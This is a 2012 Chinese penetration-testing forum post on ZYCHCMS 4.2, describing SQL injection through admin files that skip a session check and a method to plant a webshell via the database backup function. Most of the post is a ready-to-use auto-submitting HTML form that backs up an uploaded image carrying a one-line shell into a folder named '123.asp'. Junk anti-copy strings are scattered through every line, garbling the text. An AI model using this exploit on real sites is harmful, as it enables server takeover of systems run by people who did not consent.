中国网络渗透测试联盟

标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell [打印本页]

作者: admin    时间: 2012-9-10 21:09
标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

6 P8 z( ?/ [7 q; R/ I! K
0 I2 D5 J% v0 L( b" g, t$ t6 y$ F* W/ ?+ h' K8 E5 ~
9 X! R- U0 C& h3 o5 v
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
9 p9 Q/ A* x; G  q; k ①SQL注射漏洞
2 ^" e0 E9 u! A, @9 z  @% h# H 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp3 w2 v$ c2 [6 P) l+ J4 p
漏洞原因:未过滤* G3 b4 j, X$ X6 b2 A; e( g- I9 z0 ?
漏洞代码:
/ [. o+ z1 A( H( e: L. O6 y1 A 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。! ]7 r4 l7 ]& G" a' E2 V( a
修复方法:在文件开头加入代码0 {9 u+ z9 ?: {% B
7 a! o4 q( S+ p7 c7 {

# h, O6 Q. d" u1 x4 Y- J②后台拿WBSHELL
* l( e5 \2 e0 e- p3 A1 o3 D( m7 }8 k 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
) Z+ S" D, x/ y+ {2 K0 b 这里在网上找了一个,改了下,将就着用。8 i9 c9 H0 P8 ]: t6 n0 u4 `
以下是代码本地提交代码
9 D5 K+ c5 C' ?$ ^' I1 ^ + ~8 p7 s+ K- g/ B1 _) X8 h. @8 E
$ H2 y9 _% ^. @. x; ?/ z
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>$ h3 D% G: l: D3 U0 N! W7 X) V
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
* d9 a/ S& r+ F- j9 g <tr>
. O; R4 W9 y. b' K <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
9 u8 e6 R2 j9 k2 {2 i" a; y </tr>3 ]5 E4 C7 q; j4 ?; ~! |
<tr>
' L" I! M9 {! a' L. l; t: q <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
$ p3 @9 X1 h4 O! b7 m3 O </span>
) B7 c% A; [$ R: v <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >1 A" ~6 m$ G" u/ e( H) _2 I
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >1 |5 ^5 m; F0 c/ f
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
/ S" Y- d+ I! A1 b <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d# h; E+ C5 R4 T, U8 u9 o- f/ V
<div align=”left”>2 y  [3 D) i3 Z  L" P: }% h0 `: D; W8 @
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />1 A7 n- N" {1 z7 a- T* J
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
  F9 A4 R- `* l, |: [ <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
# a- K  r8 M' G </div></td>1 p: {3 L& m1 G' e0 a
</tr>' n0 t8 Y# E2 ]' [0 \" y. }0 c
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
# x( K% z% O3 ^. C <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
% J9 y1 P, {; [ <td class=”td”><div align=”left”>1 F- S0 b! |+ d# [5 y9 B
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
) x6 G, }- W, k1 [ [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
) V0 z* o9 |. a% _8 B( h( x7 \ </tr>
- S( ?4 c8 G6 N4 y9 T! ^ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
3 h( I  X. V- F, V- k4 Q. W* E; G; h <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>* v9 `' Z7 v" k. U8 _; Q! @6 c) V( O
<td class=”td”><div align=”left”>
+ B+ {- M6 y( Y: V$ [ <input type=”submit” value=”确定备份” class=”btn”: M/ C/ M$ K$ q1 _4 K( H$ r
</div></td>$ l( S1 S" I! r
</tr>+ K* {7 X. K2 b  K2 S6 r
</table></td></tr></form>( X' T$ G' G$ t5 Z; j9 _0 v
</table>
5 m! M8 }/ t- W </td>" A" Q* ?/ V% w# U- _0 e! U1 @* r
</tr>
" _0 ]6 |4 B) h0 K; t5 |5 ~4 j </table>
. X4 I+ H; l1 E  X' p- \ <script>
- p0 C) ~3 @8 T6 v document.all.add.submit();
" {8 z$ ?' @$ g- `* k1 l+ b: E </script>* ^/ [0 T( T9 ?
* y0 Q8 g2 H- S% T( m

2 {: D" I4 B  s( j/ N6 k
5 i. f4 A) W( i  ^
( I7 W8 D% y- n* u+ C
; E; K0 S2 w6 z6 o' f0 X3 V! y$ f% I

& N6 e# M) `  b- @# M+ g# n
7 m2 t0 A$ X% m% h  z9 \9 }
, i& i3 t. o# g
0 |( p2 P/ o) H




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2